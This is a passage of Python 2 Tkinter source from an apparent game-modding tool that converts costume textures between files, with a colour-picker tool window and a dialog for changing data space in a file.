				if sourceBlockLength == destBlockLength:
					# Replace the data blocks. (Offsets are doubled because the data is held as a hex string; 2 characters per byte.)
					destDatHex = replaceHex( destDatHex, destBlockStart, sourceDatHex[sourceBlockStart*2:sourceBlockEnd*2] )
				elif destBlockLength > 0x1C: # Excludes reporting of palette header blocks.
					unmodifiedBlocks.append( destBlocks[blockIteration] )
					print 'block', uHex(destBlocks[blockIteration][0]) + ', ' + uHex(destBlocks[blockIteration][1]), 'queuing skip'
					skipNextBlock = True

			# Conversion has completed. Check whether the destination file is from a disc or a standalone file, and save the new file data accordingly.
			if Gui.isoFileTree.exists( destFilepath ): # 'destFilepath' will actually be an iid in this case.
				_, entity, isoOffset, fileSize, isoPath, _, _ = Gui.isoFileTree.item( destFilepath, 'values' ) # description, entity, isoOffset, fileSize, isoPath, source, data
				Gui.isoFileTree.item( destFilepath, values=('Converted and ready to be replaced...', entity, isoOffset, fileSize, isoPath, 'ram', destFileHeader + destDatHex), tags='changed' )
				#Gui.mainTabFrame.select( Gui.discTab )
				global unsavedDiscChanges
				unsavedDiscChanges.append( os.path.basename(sourceFilepath) + ' converted and ready for import.' )
			else:
				writeDatFile( destFilepath, bytearray.fromhex(destFileHeader + destDatHex), 'Conversion' )

			Gui.cccOpenConvertedFileButton['state'] = 'normal'
			updateProgramStatus( 'Conversion Complete' )

			# Alert the user of any areas that still need to be manually replaced.
			if unmodifiedBlocks != []:
				cmsg("Some textures could not be replaced, due to differences in the textures' properties between the two files (such as having different resolutions or " \
					'differently sized palettes). Textures that were able to be copied over have been transferred. However, the textures in the following ranges will still need ' \
					'to be replaced. (You can click on the "Offset (len)" column header on the DAT Texture Tree tab to view textures in the order that they appear in the file.):\n\n' + \
					'\n'.join( [uHex(block[0]) + ' to ' + uHex(block[1]) for block in unmodifiedBlocks] ), 'Some Manual Transfers Required' )

			# Contingency messages (character/color-specific caveats that always apply).
			if sourceCharKey == 'Kirby':
				cmsg("Most textures have been copied over, however his eye textures will need to be done manually.")
			elif sourceCharKey == 'Mewtwo' and sourceColorKey == 'Nr':
				cmsg("The source textures have been copied over. However, note that Mewtwo's Neutral costume has an extra eye texture (at 0x2f440 to 0x31440) that " \
					"doesn't exist or have an equivalent in the other colors. So it will not be included in the destination file/costume.")
			elif destCharKey == 'Mewtwo' and destColorKey == 'Nr':
				cmsg("Mewtwo's Neutral costume has an extra eye texture (at 0x2f440 to 0x31440), which doesn't exist or have an equivalent in the other colors. So " \
					"although the rest of the textures have been copied, you'll need to replace this texture manually (you can try using one of the other eye textures, " \
					"or create a new one).")
			elif destCharKey == 'Pichu' and destColorKey == 'Bu':
				cmsg("Pichu's body and eye textures have been transferred over. However, Pichu's alternate colors each have an extra part to its model, which each " \
					"have unique textures (i.e. no equivalents in the other costume files). For its Blue alt, this would be its goggles, whose textures " \
					"extend from 0x16800 to 0x1E800 (7 textures), and 0x28820 and 0x28C20 (1 texture). You'll need to update these manually if you want to change them.")
			elif destCharKey == 'Pichu' and destColorKey == 'Gr':
				cmsg("Pichu's body and eye textures have been transferred over. However, Pichu's alternate colors each have an extra part to its model, which each " \
					"have unique textures (i.e. no equivalents in the other costume files). For its Green alt, this would be its backpack, whose textures " \
					"extend from 0x17320 to 0x2C320 (13 textures), and 0x35B20 to 0x3DB20 (1 texture). You'll need to update these manually if you want to change them.")
			# elif destCharKey == 'Pichu' and destColorKey == 'Nr':
			# 	cmsg("Pichu's body (and eye) textures have been transferred over. However, Pichu's alternate colors each have an extra part to its model, which each " \
			# 		"have unique textures (i.e. no equivalents in the other costume files). Thus, these textures won't be touched.")
			elif destCharKey == 'Pichu' and destColorKey == 'Re':
				cmsg("Pichu's body and eye textures have been transferred over. However, Pichu's alternate colors each have an extra part to its model, which each " \
					"have unique textures (i.e. no equivalents in the other costume files). For its Red alt, this would be its scarf, whose textures " \
					"extend from 0x21200 to 0x25200 (2 textures). You'll need to update these manually if you want to change them.")
			elif destCharKey == 'Pikachu' and destColorKey == 'Bu':
				cmsg("Pikachu's body and eye textures have been transferred over. However, due to variations among its hats, you'll need to update the textures " \
					"for those manually if you want to change them. For Pikachu's Blue alt, this would be its magician's hat, whose textures " \
					"extend from 0x15860 to 0x19860 (2 textures).")
			elif destCharKey == 'Pikachu' and destColorKey == 'Gr':
				cmsg("Pikachu's body and eye textures have been transferred over. However, due to variations among its hats, you'll need to update the textures " \
					"for those manually if you want to change them. For Pikachu's Green alt, this would be its fedora, whose textures " \
					"extend from 0x15f60 to 0x19f60 (2 textures).")
			elif destCharKey == 'Pikachu' and destColorKey == 'Re':
				cmsg("Pikachu's body and eye textures have been transferred over. However, due to variations among its hats, you'll need to update the textures " \
					"for those manually if you want to change them. For Pikachu's Red alt, this would be Red's hat, whose textures " \
					"extend from 0x152a0 to 0x1baa00 (3 textures).")
			elif destCharKey == 'Purin' and destColorKey == 'Bu':
				cmsg("Jigglypuff's body and eye textures have been transferred over. However, due to variations among its head pieces, you'll need to update the textures " \
					"for those manually if you want to change them. For Jigglypuff's Blue alt, this would be the bow, whose textures " \
					"extend from 0x3e2e0 to 0x3e320 (2 textures).")
			elif destCharKey == 'Purin' and destColorKey == 'Gr':
				cmsg("Jigglypuff's body and eye textures have been transferred over. However, due to variations among its head pieces, you'll need to update the textures " \
					"for those manually if you want to change them. For Jigglypuff's Green alt, this would be the bandana, whose textures " \
					"extend from 0x3caa0 to 0x3dac0 (3 textures).")
			elif destCharKey == 'Purin' and destColorKey == 'Re':
				cmsg("Jigglypuff's body and eye textures have been transferred over. However, due to variations among its head pieces, you'll need to update the textures " \
					"for those manually if you want to change them. For Jigglypuff's Red alt, this would be the flower, whose textures " \
					"extend from 0x3b760 to 0x3d760 (1 texture).")
			elif destCharKey == 'Purin' and destColorKey == 'Ye':
				cmsg("Jigglypuff's body and eye textures have been transferred over. However, due to variations among its head pieces, you'll need to update the textures " \
					"for those manually if you want to change them. For Jigglypuff's Yellow alt, this would be the crown, whose textures " \
					"extend from 0x3b420 to 0x3fc20 (5 textures).")
def openConvertedCharacterFile():
    """ Used by the Character Color Converter (CCC) tab to open a finished/converted costume
        file in the DAT Texture Tree tab, so the user can confirm the conversion was
        successful and the new textures are intact. """
    convertedFilePath = CCC['dataStorage']['destFile']

    if not Gui.isoFileTree.exists( convertedFilePath ):
        # Not present in the disc file tree; treat it as a standalone file path
        fileHandler( [convertedFilePath] )
        return

    # The path exists in the disc file tree; in this case it's actually an iid
    loadFileWithinDisc( convertedFilePath )
#======================#
# ~ ~ Tool Modules ~ ~ #
#======================#
class MeleeColorPicker( object ):

    """ Tool window for analyzing and converting a single color between color spaces (decimal
        RGBA, RGBA hex, and the TPL texture formats used by the game), and — when given a
        title other than 'Color Converter' — for picking a new color to replace a palette
        entry or other color value in the currently loaded file. Multiple instances may be
        open at once; they're tracked by windowId in the class-level 'windows' dict. """

    windows = {} # Used to track multiple windows for multiple palette entries. New windows will be added with a windowId = palette entry's canvas ID
    recentColors = [] # Colors stored as tuples of (r, g, b, a); shared across all instances
    windowSpawnOffset = 0

    def __init__( self, title='Color Converter', initialColor='ACACAC7F', defaultTplFormat=5, windowId='', datDataOffsets=() ):
        """ Initializes color state and creates the tool window (unless a window with this
            windowId is already being tracked). initialColor is an 'RRGGBBAA' hex string;
            defaultTplFormat selects the TPL format initially shown in the drop-down. """
        self.title = title
        self.initialColor = initialColor.upper()
        self.currentHexColor = self.initialColor
        self.currentRGBA = hex2rgb( self.initialColor )[0] # hex2rgb returns ( channelsList, parsingError )
        self.tplHex = tplEncoder.encodeColor( defaultTplFormat, self.currentRGBA )
        self.windowId = windowId
        self.datDataOffsets = datDataOffsets # ( rgbaColor, paletteEntry, paletteEntryOffset, imageDataOffset ) | paletteEntry is the original palette color hex
        self.lastUpdatedColor = '' # Used to prevent unnecessary/redundant calls to update the displayed texture

        if self.windowId in self.windows: pass #MeleeColorPicker.windows[self.windowId].window.deiconify()
        else:
            self.createWindow( defaultTplFormat )

            # If windowId, remember it so it can be referenced later (by deiconify)
            if self.windowId: self.windows[self.windowId] = self
            self.window.deiconify()

    def createWindow( self, defaultTplFormat ):
        """ Builds the color picker window and all of its GUI: recent-color swatches, the
            RGB/alpha pickers, the color space comparison fields, and (when used as a picker
            rather than just a converter) Submit/Cancel buttons. """
        self.window = Tk.Toplevel( Gui.root )
        self.window.title( self.title )
        self.window.attributes( '-toolwindow', 1 ) # Makes window framing small, like a toolbox/widget.
        self.window.resizable( width=False, height=False )
        self.window.wm_attributes( '-topmost', 1 )
        self.window.protocol( 'WM_DELETE_WINDOW', self.cancel ) # Overrides the 'X' close button.

        # Calculate the spawning position of the new window
        rootDistanceFromScreenLeft, rootDistanceFromScreenTop = getWindowGeometry( Gui.root )[2:]
        newWindowX = rootDistanceFromScreenLeft + 180 + self.windowSpawnOffset
        newWindowY = rootDistanceFromScreenTop + 180 + self.windowSpawnOffset
        self.window.geometry( '+' + str(newWindowX) + '+' + str(newWindowY) )
        # NOTE(review): this assignment creates an instance attribute shadowing the class-level
        # windowSpawnOffset, so the offset doesn't accumulate across separately-created
        # windows as the class attribute appears to intend — confirm whether that's deliberate.
        self.windowSpawnOffset += 30
        if self.windowSpawnOffset > 150: self.windowSpawnOffset = 15

        # Populate the window
        mainFrame = Tk.Frame( self.window )

        # Show any remembered colors
        if self.recentColors:
            self.recentColorImages = [] # Keeps PhotoImage references alive (Tk only draws images that are referenced)
            self.itemColors = {} # Maps canvas item IDs to their (r, g, b, a) tuples
            if len( self.recentColors ) < 13: canvasHeight = 19
            else: canvasHeight = 38
            ttk.Label( mainFrame, text='Recent Colors:' ).pack( anchor='w', padx=16, pady=4 )
            self.colorsCanvas = Tk.Canvas( mainFrame, borderwidth=2, relief='ridge', background='white', width=197, height=canvasHeight )
            self.colorsCanvas.pack( pady=4 )
            x = 10
            y = 9
            for i, rgbaColor in enumerate( reversed(self.recentColors) ):
                # Prepare and store an image object for the color
                colorSwatchImage = Image.new( 'RGBA', (8, 8), rgbaColor )
                colorSwatchWithBorder = ImageOps.expand( colorSwatchImage, border=1, fill='black' )
                self.recentColorImages.append( ImageTk.PhotoImage(colorSwatchWithBorder) )

                # Draw the image onto the canvas.
                itemId = self.colorsCanvas.create_image( x, y, image=self.recentColorImages[i], anchor='nw', tags='swatches' )
                self.itemColors[itemId] = rgbaColor
                x += 16
                if i == 11: # Start a new line
                    x = 10
                    y += 16
            self.colorsCanvas.tag_bind( 'swatches', '<1>', self.restoreColor )
            def onMouseEnter(e): self.colorsCanvas['cursor']='hand2'
            def onMouseLeave(e): self.colorsCanvas['cursor']=''
            self.colorsCanvas.tag_bind( 'swatches', '<Enter>', onMouseEnter )
            self.colorsCanvas.tag_bind( 'swatches', '<Leave>', onMouseLeave )

        # RGB Channels
        ttk.Label( mainFrame, text='Choose the RGB Channel values:' ).pack( anchor='w', padx=16, pady=4 )
        curtainFrame = Tk.Frame( mainFrame, borderwidth=2, relief='ridge', width=250, height=50, cursor='hand2' )
        whiteCurtain = Tk.Frame( curtainFrame, bg='white', width=25, height=50 )
        whiteCurtain.pack( side='left' )
        focusColorsFrame = Tk.Frame( curtainFrame, width=200, height=50 )

        # Combine the initial color with the default background color, to simulate alpha on the colored frame (since Frames don't support alpha)
        bgColor16Bit = Gui.root.winfo_rgb( focusColorsFrame['bg'] )
        self.nativeBgColor = ( bgColor16Bit[0]/256, bgColor16Bit[1]/256, bgColor16Bit[2]/256 ) # Reduce it to an 8-bit colorspace (integer division under Python 2)
        newColors = []
        alphaBlending = round( self.currentRGBA[-1] / 255.0, 2 )
        for i, colorChannel in enumerate( self.nativeBgColor ):
            newColors.append( int(round( (alphaBlending * self.currentRGBA[i]) + (1-alphaBlending) * colorChannel )) )
        originalColorBg = rgb2hex( newColors )
        # Pick a readable label font color against the blended background
        if getLuminance( originalColorBg + 'ff' ) > 127: fontColor = 'black'
        else: fontColor = 'white'
        self.originalColor = Tk.Frame( focusColorsFrame, bg=originalColorBg, width=200, height=25 )
        Tk.Label( self.originalColor, text='Original Color', bg=originalColorBg, foreground=fontColor ).pack()
        self.currentRgbDisplay = Tk.Frame( focusColorsFrame, width=200, height=25 ) # , bg='#ACACAC'
        Tk.Label( self.currentRgbDisplay, text='New Color' ).pack()
        focusColorsFrame.pack( side='left' )
        for frame in [ self.originalColor, self.currentRgbDisplay ]:
            frame.pack()
            frame.pack_propagate( False )
            frame.bind( '<1>', self.pickRGB )
            frame.winfo_children()[0].bind( '<1>', self.pickRGB )
        blackCurtain = Tk.Frame( curtainFrame, bg='black', width=25, height=50 )
        blackCurtain.pack( side='left' )
        curtainFrame.pack( padx=5, pady=4 )
        curtainFrame.pack_propagate( False )
        for frame in curtainFrame.winfo_children(): frame.pack_propagate( False )

        # Alpha Channel
        ttk.Label( mainFrame, text='Choose the Alpha Channel value:' ).pack( anchor='w', padx=16, pady=4 )
        alphaRowFrame = Tk.Frame( mainFrame )
        self.alphaEntry = ttk.Entry( alphaRowFrame, width=3 )
        self.alphaEntry.pack( side='left', padx=4 )
        self.alphaEntry.bind( '<KeyRelease>', self.alphaUpdated )
        self.alphaSlider = ttk.Scale( alphaRowFrame, orient='horizontal', from_=0, to=255, length=260, command=self.alphaUpdated )
        self.alphaSlider.pack( side='left' , padx=4 )
        alphaRowFrame.pack( padx=5, pady=4 )

        # Color Value Conversions
        ttk.Label( mainFrame, text='Color Space Comparisons:' ).pack( anchor='w', padx=16, pady=4 )
        colorEntryFieldsFrame = Tk.Frame( mainFrame )

        # RGBA (decimal and hex forms)
        ttk.Label( colorEntryFieldsFrame, text='RGBA:' ).grid( column=0, row=0, padx=5 )
        self.rgbaStringVar = Tk.StringVar()
        self.rgbaEntry = ttk.Entry( colorEntryFieldsFrame, textvariable=self.rgbaStringVar, width=16, justify='center' )
        self.rgbaEntry.grid( column=1, row=0, padx=5 )
        self.rgbaEntry.bind( '<KeyRelease>', self.rgbaEntryUpdated )
        ttk.Label( colorEntryFieldsFrame, text='RGBA Hex:' ).grid( column=2, row=0, padx=5, pady=5 )
        self.hexColorStringVar = Tk.StringVar()
        self.rgbaHexEntry = ttk.Entry( colorEntryFieldsFrame, textvariable=self.hexColorStringVar, width=10, justify='center' )
        self.rgbaHexEntry.grid( column=3, row=0, padx=5 )
        self.rgbaHexEntry.bind( '<KeyRelease>', self.hexEntryUpdated )

        # TPL Formats
        ttk.Label( colorEntryFieldsFrame, text='TPL Format:' ).grid( column=0, row=1, padx=5 )
        self.tplFormat = Tk.StringVar()
        if 'Palette' in self.title: # Limit the selection of formats to just those used for palettes.
            formatList = userFriendlyFormatList[3:-4]
        else: formatList = userFriendlyFormatList[:-4]
        self.tplFormat.set( formatList[defaultTplFormat] )
        self.tplFormatOptionMenu = ttk.OptionMenu( colorEntryFieldsFrame, self.tplFormat, formatList[defaultTplFormat], *formatList, command=self.updateColorDisplays )
        self.tplFormatOptionMenu.grid( column=1, row=1, padx=5, pady=5 )
        if 'Palette' in self.title: self.tplFormatOptionMenu['state'] = 'disabled'
        self.tplFormatStringVar = Tk.StringVar()
        self.tplFormatEntry = ttk.Entry( colorEntryFieldsFrame, textvariable=self.tplFormatStringVar, width=13, justify='center' )
        self.tplFormatEntry.grid( column=2, columnspan=2, row=1, padx=5, sticky='w' )
        self.tplFormatEntry.bind( '<KeyRelease>', self.tplEntryUpdated )
        colorEntryFieldsFrame.pack( padx=5, pady=4 )
        self.updateColorDisplays( updateImage=False )
        #self.alphaSlider.set( self.currentRGBA[-1] )

        # Buttons! For use when this isn't just a comparison tool, but being used as a color picker to replace a value in a game/file
        if self.title != 'Color Converter':
            buttonsFrame = Tk.Frame( mainFrame )
            ttk.Button( buttonsFrame, text='Submit', command=self.submit ).pack( side='left', ipadx=4, padx=20 )
            ttk.Button( buttonsFrame, text='Cancel', command=self.cancel ).pack( side='left', ipadx=4, padx=20 )
            buttonsFrame.pack( pady=8 )
        mainFrame.pack()
        self.updateEntryBorders( None )
        self.window.bind( '<FocusIn>', self.updateEntryBorders ) # Allows for switching between multiple open windows to move the highlighting around

    def updateEntryBorders( self, event ): # Updates the border color of palette entries to indicate whether they're selected
        """ Highlights (in the main palette canvas) the palette entry associated with this
            window, and un-highlights any previously selected entries. Bound to <FocusIn>. """
        if 'Palette' in self.title:
            # If any items are currently selected, change their border color back to normal
            for item in Gui.paletteCanvas.find_withtag( 'selected' ):
                Gui.paletteCanvas.itemconfig( item, fill='black' )
                Gui.paletteCanvas.dtag( item, 'selected' ) # Removes this tag from the canvas item

            # Use the paletteEntryOffset tag to locate the border item (getting its canvas ID)
            if self.datDataOffsets != ():
                borderIids = Gui.paletteCanvas.find_withtag( 't'+str(self.datDataOffsets[2]) )
                if borderIids:
                    Gui.paletteCanvas.itemconfig( borderIids[0], fill=Gui.paletteCanvas.entryBorderColor, tags=('selected', 't'+str(self.datDataOffsets[2])) )

    def updateColorDisplays( self, updateImage=True, setAlphaEntry=True ): # Updates the visual representation, alpha value/slider, and colorspace Entry values
        """ Refreshes every GUI color representation from self.currentRGBA / self.currentHexColor.
            NOTE(review): when invoked as the TPL format OptionMenu's command, 'updateImage'
            receives the selected format string (truthy) rather than a boolean — presumably
            intentional, since a format change should refresh the texture; confirm. """
        currentTplFormat = int( self.tplFormat.get().split()[0][1:] )
        if currentTplFormat in [ 0, 1, 4 ]: alphaSupported = False
        else: alphaSupported = True

        # Combine the newly selected color with the default background color, to simulate alpha on the colored frame (since Frames don't support transparency)
        newColors = []
        alphaBlending = round( self.currentRGBA[-1] / 255.0, 2 )
        for i, color in enumerate( self.nativeBgColor ):
            newColors.append( int(round( (alphaBlending * self.currentRGBA[i]) + (1-alphaBlending) * color )) )
        currentColorLabel = self.currentRgbDisplay.winfo_children()[0]
        currentColorBg = rgb2hex( newColors )
        self.currentRgbDisplay['bg'] = currentColorBg
        currentColorLabel['bg'] = currentColorBg
        # Keep the label text readable against the new background
        if getLuminance( currentColorBg + 'ff' ) > 127: currentColorLabel['fg'] = 'black'
        else: currentColorLabel['fg'] = 'white'

        # Set the alpha components of the GUI
        self.preventNextSliderCallback = True # Prevents an infinite loop where the programmatic setting of the slider causes another update for this function
        self.alphaEntry['state'] = 'normal'
        self.alphaSlider.state(['!disabled'])
        currentAlphaLevel = self.currentRGBA[-1]
        if not alphaSupported: # These formats do not support alpha; max the alpha channel display and disable the widgets
            self.alphaEntry.delete( 0, 'end' )
            self.alphaEntry.insert( 0, '255' )
            self.alphaSlider.set( 255 )
            self.alphaEntry['state'] = 'disabled'
            self.alphaSlider.state(['disabled'])
        elif setAlphaEntry: # Prevents moving the cursor position if the user is typing into this field
            self.alphaEntry.delete( 0, 'end' )
            self.alphaEntry.insert( 0, str(currentAlphaLevel) ) #.lstrip('0')
            self.alphaSlider.set( currentAlphaLevel )
        else: self.alphaSlider.set( currentAlphaLevel ) # User entered a value into the alphaEntry; don't modify that

        # Set the RGBA fields
        if alphaSupported:
            self.rgbaStringVar.set( ', '.join([ str(channel) for channel in self.currentRGBA ]) )
            self.hexColorStringVar.set( self.currentHexColor )
        else:
            self.rgbaStringVar.set( ', '.join([ str(channel) for channel in self.currentRGBA[:-1] ]) )
            self.hexColorStringVar.set( self.currentHexColor[:-2] )

        # Set the TPL Entry field
        self.tplHex = tplEncoder.encodeColor( currentTplFormat, self.currentRGBA )
        if currentTplFormat < 6:
            self.tplFormatStringVar.set( self.tplHex.upper() )
        elif currentTplFormat == 6: # In this case, the value will actually be a tuple of the color parts
            self.tplFormatStringVar.set( self.tplHex[0].upper() + ' | ' + self.tplHex[1].upper() )
        else: self.tplFormatStringVar.set( 'N/A' )

        if 'Palette' in self.title and updateImage:
            # Validate the encoded color
            if len( self.tplHex ) != 4 or not validHex( self.tplHex ):
                msg( 'The newly generated color was not two bytes!' )
            else:
                self.updateTexture( self.tplHex )

    def pickRGB( self, event ):
        """ Opens the OS color chooser dialog and applies the chosen RGB values,
            preserving the currently selected alpha level. """
        try: rgbValues, hexColor = askcolor( initialcolor='#'+self.currentHexColor[:-2], parent=self.window )
        except: rgbValues, hexColor = '', ''

        if rgbValues:
            # Get the current alpha value, and combine it with the colors chosen above.
            currentAlphaLevel = int( round(self.alphaSlider.get()) )
            self.currentRGBA = ( rgbValues[0], rgbValues[1], rgbValues[2], currentAlphaLevel )
            self.currentHexColor = hexColor.replace('#', '').upper() + "{0:0{1}X}".format( currentAlphaLevel, 2 )
            self.updateColorDisplays()

    def alphaUpdated( self, event ):
        """ Callback for both the alpha Entry (receives a KeyRelease event object) and
            the alpha Scale (which passes its new value as a string). """
        if self.preventNextSliderCallback:
            self.preventNextSliderCallback = False
            return
        else:
            setAlphaEntry = True

            if isinstance( event, str ): newAlphaValue = int( float(event) ) # Means this was called by the slider, which passes its value as a string
            else:
                newAlphaValue = int( round(float( event.widget.get() )) )
                setAlphaEntry = False # The user typed this value; don't rewrite the Entry under their cursor

            self.currentRGBA = self.currentRGBA[:-1] + ( newAlphaValue, )
            self.currentHexColor = self.currentHexColor[:-2] + "{0:0{1}X}".format( newAlphaValue, 2 )
            self.updateColorDisplays( setAlphaEntry=setAlphaEntry )

    def rgbaEntryUpdated( self, event ):
        """ KeyRelease handler for the decimal RGBA Entry; expects "r, g, b, a" with
            each value in 0-255. Invalid input is ignored unless Enter is pressed. """
        # Parse and validate the input
        channels = event.widget.get().split(',')
        channelsList = []
        parsingError = False

        for channelValue in channels:
            try:
                newInt = int( float(channelValue) )
                if newInt > -1 and newInt < 256: channelsList.append( newInt )
            except:
                parsingError = True
                break
        else: # Got through the above loop with no break. Still got one more check.
            if len( channelsList ) != 4:
                parsingError = True

        if parsingError:
            if event.keysym == 'Return': # User hit the "Enter" key in a confused attempt to force an update
                msg( 'The input should be in the form, "r, g, b, a", where each value is within the range of 0 - 255.', 'Invalid input or formatting.' )
        else: # Everything checks out, update the color and GUI
            self.currentRGBA = tuple( channelsList )
            self.currentHexColor = ''.join( [ "{0:0{1}X}".format( channel, 2 ) for channel in self.currentRGBA ] )
            self.updateColorDisplays()

    def hexEntryUpdated( self, event ):
        """ KeyRelease handler for the RGBA hex Entry; expects an 'RRGGBBAA' string. """
        # Parse and validate the input
        inputStr = event.widget.get()
        channelsList, parsingError = hex2rgb( inputStr )

        if parsingError:
            if event.keysym == 'Return': # User hit the "Enter" key in a confused attempt to force an update
                msg( 'The input should be in the form, "RRGGBBAA", where each value is within the hexadecimal range of 00 - FF.', 'Invalid input or formatting.' )
        else: # Everything checks out, update the color and GUI
            self.currentRGBA = tuple( channelsList )
            self.currentHexColor = ''.join( [ "{0:0{1}X}".format( channel, 2 ) for channel in self.currentRGBA ] )
            self.updateColorDisplays()

    def tplEntryUpdated( self, event ):
        """ KeyRelease handler for the TPL-format Entry; decodes the entered hex using
            the currently selected TPL format (once the expected digit count is reached). """
        tplHex = self.tplFormatStringVar.get().replace('0x', '').replace('|', '')
        nibbleCount = { 0:1, 1:2, 2:2, 3:4, 4:4, 5:4, 6:8, 8:1, 9:2, 10:4, 14:1 } # How many characters should be present in the string
        currentTplFormat = int( self.tplFormat.get().split()[0][1:] )

        if len( tplHex ) == nibbleCount[currentTplFormat] and validHex( tplHex ):
            self.currentRGBA = tplDecoder.decodeColor( currentTplFormat, tplHex )
            self.currentHexColor = ''.join( [ "{0:0{1}X}".format( channel, 2 ) for channel in self.currentRGBA ] )
            self.updateColorDisplays()

    def restoreColor( self, event ):
        """ Click handler for the recent-color swatches; re-applies the clicked color. """
        item = event.widget.find_closest( event.x, event.y )[0]
        self.currentRGBA = self.itemColors[item]
        self.currentHexColor = ''.join( [ "{0:0{1}X}".format( channel, 2 ) for channel in self.currentRGBA ] )
        self.updateColorDisplays()

    def updateRecentColors( self ):
        """ Adds the current color to the shared recent-colors list (deduplicated). """
        # If the current color is already in the list, remove it, and re-add it to the end
        # of the list (the swatch display iterates in reverse, so newest shows first).
        for i, colorTuple in enumerate( self.recentColors ):
            if colorTuple == self.currentRGBA:
                self.recentColors.pop( i )
                break
        self.recentColors.append( self.currentRGBA )

        # Keep the list under a certain size
        while len( self.recentColors ) > 24:
            self.recentColors.pop( 0 )

    def updateTexture( self, paletteEntryHex ): # This function only used when updating palette colors
        """ Writes the given 2-byte palette color into the file data (untracked change) and
            re-renders the affected texture in the main display and palette tab. """
        if self.datDataOffsets != ():
            if paletteEntryHex == self.lastUpdatedColor: # Nothing new to do
                return

            # Replace the color in the image or palette data
            _, _, paletteEntryOffset, imageDataOffset = self.datDataOffsets
            globalDatFile.updateData( paletteEntryOffset, bytearray.fromhex(paletteEntryHex), 'Palette entry modified', trackChange=False )

            # Load the new data for the updated texture and display it
            width, height, imageType = globalDatFile.structs[imageDataOffset].getAttributes()[1:4]
            imageDataLength = getImageDataLength( width, height, imageType )
            loadSuccessful = renderTextureData( imageDataOffset, width, height, imageType, imageDataLength, allowImageDumping=False )

            if not loadSuccessful:
                msg( 'There was an error rendering the new texture data.' )
                return

            drawTextureToMainDisplay( imageDataOffset )
            populatePaletteTab( imageDataOffset, imageDataLength, imageType )
            self.lastUpdatedColor = paletteEntryHex
            updateProgramStatus( 'Palette Color Updated' )

    def submit( self ):
        """ Accepts the current color: remembers it, records the change (for palettes),
            and closes the window. """
        self.updateRecentColors()
        if 'Palette' in self.title:
            globalDatFile.unsavedChanges.append( 'Palette color ' + self.initialColor + ' changed to ' + self.currentHexColor + '.' )
        self.close()

    def cancel( self ):
        """ Discards the current selection and closes the window. """
        # If the window was being used to update a palette color, revert the color back to the original
        if 'Palette' in self.title:
            self.updateTexture( self.datDataOffsets[1] )
            self.currentHexColor = self.initialColor
        self.close()

    def close( self ):
        """ Destroys the window and removes it from the class-level tracking dict. """
        self.window.destroy()
        if self.windowId:
            del self.windows[self.windowId]
#================================#
# ~ ~ GUI Specific Functions ~ ~ #
#================================#
def cmsg( message, title='', align='center', buttons=None, makeModal=False ):
    """ Convenience shorthand for showing a CopyableMessageWindow (a message dialog whose
        text can be selected and copied), parented to the program's root window. """
    parentWindow = Gui.root
    CopyableMessageWindow( parentWindow, message, title, align, buttons, makeModal )
def onFileTreeDoubleClick( event ):
    """ Handles double-clicks on the disc file tree: toggles folders open/closed,
        or loads the double-clicked file. """
    fileTree = Gui.isoFileTree
    region = fileTree.identify_region( event.x, event.y ) # Possible returns: 'heading', 'tree', 'cell', 'nothing'

    # 'tree' = the first default/navigation column; 'cell' should be any standard column/row
    if region in ( 'tree', 'cell' ):
        iid = fileTree.identify( 'item', event.x, event.y )
        entity = fileTree.item( iid, 'values' )[1]

        if entity == 'folder':
            # Toggle the folder open or closed
            currentlyOpen = fileTree.item( iid, 'open' )
            fileTree.item( iid, open=not currentlyOpen )
        else:
            loadFileWithinDisc( iid )

    # Returning 'break' is necessary to prevent any further propagation of the click event within the GUI
    return 'break'
# def onStructureTreeDoubleClick( event ):
# clickedRegion = Gui.fileStructureTree.identify_region( event.x, event.y ) # Possible returns: 'heading', 'tree', 'cell', 'nothing'
# if clickedRegion == 'tree' or clickedRegion == 'cell': # 'tree' = the first default/navigation column, 'cell' should be any standard column/row
# iid = Gui.fileStructureTree.identify( 'item', event.x, event.y )
# # If the struct has children, toggle the 'folder' view open or closed
# if Gui.fileStructureTree.get_children():
# print 'toggling', iid
# Gui.fileStructureTree.item( iid, open=not Gui.fileStructureTree.item( iid, 'open' ) )
# return 'break' # Returning 'break' is necessary to prevent any further propagation of the click event within the GUI
class DataSpaceModifierWindow( object ):

    """ Small blocking tool window that prompts the user for an offset and an amount,
        used for collapsing (removing) or expanding data space within a file. After
        construction returns, self.offset and self.amount hold the entered strings
        (both '' if the window was canceled). """

    def __init__( self, master, mode ):
        self.window = win = Tk.Toplevel( master )
        win.title( 'Data Space Modifier' )
        win.resizable( width=False, height=False )
        win.attributes( '-toolwindow', 1 ) # Makes window framing small, like a toolbox widget.
        win.wm_attributes( '-topmost', 1 ) # Makes window stay topmost to other program windows.

        # Spawn the window at a position relative to the main program window
        distFromScreenLeft, distFromScreenTop = getWindowGeometry( Gui.root )[2:]
        win.geometry( '+%d+%d' % (distFromScreenLeft + 200, distFromScreenTop + 140) )

        # Describe what this mode of the feature will do
        if mode == 'collapse':
            usageText = ( 'This feature will remove/delete data from the file, starting at the given offset. '
                          'This includes removal of pointers within, or pointing to, the affected area. As well as removal of '
                          'root/reference nodes, and strings within the string table, if associated with the affected area. ' )
        else:
            usageText = ( 'This feature will increase the amount of file/data space at the given offset. '
                          'This does not create a new structure; the existing structure at the given offset is merely extended. ' )
        usageText += ( 'This feature may adjust the amount, in order to preserve alignment for other file structures. '
                       '\n\nPlease note that this is an experimental feature. It is advised to make a back-up copy of your files before use.' )
        ttk.Label( win, text=usageText, wraplength=400 ).pack( padx=15, pady=5 )

        # Input fields for the target offset and the amount of space to add/remove
        fieldsFrame = ttk.Frame( win )
        self.offsetEntry = self._addField( fieldsFrame, 'Offset:', 0 )
        self.amountEntry = self._addField( fieldsFrame, 'Amount:', 1 )
        fieldsFrame.pack( pady=5 )

        # Add the Submit/Cancel buttons
        buttonsFrame = ttk.Frame( win )
        self.okButton = ttk.Button( buttonsFrame, text='Submit', command=self.submit )
        self.okButton.pack( side='left', padx=10 )
        ttk.Button( buttonsFrame, text='Cancel', command=self.cancel ).pack( side='left', padx=10 )
        win.protocol( 'WM_DELETE_WINDOW', self.cancel ) # Overrides the 'X' close button.
        buttonsFrame.pack( pady=7 )

        # Move focus to this window (for keyboard control), and pause execution of the
        # main window/thread until this window is closed.
        self.offsetEntry.focus_set()
        master.wait_window( win )

    @staticmethod
    def _addField( parent, labelText, row ):
        # Builds one label + entry pair on the given grid row, returning the entry widget
        ttk.Label( parent, text=labelText ).grid( column=0, row=row, padx=7, pady=5 )
        entry = ttk.Entry( parent, width=9 )
        entry.grid( column=1, row=row, padx=7, pady=5 )
        return entry

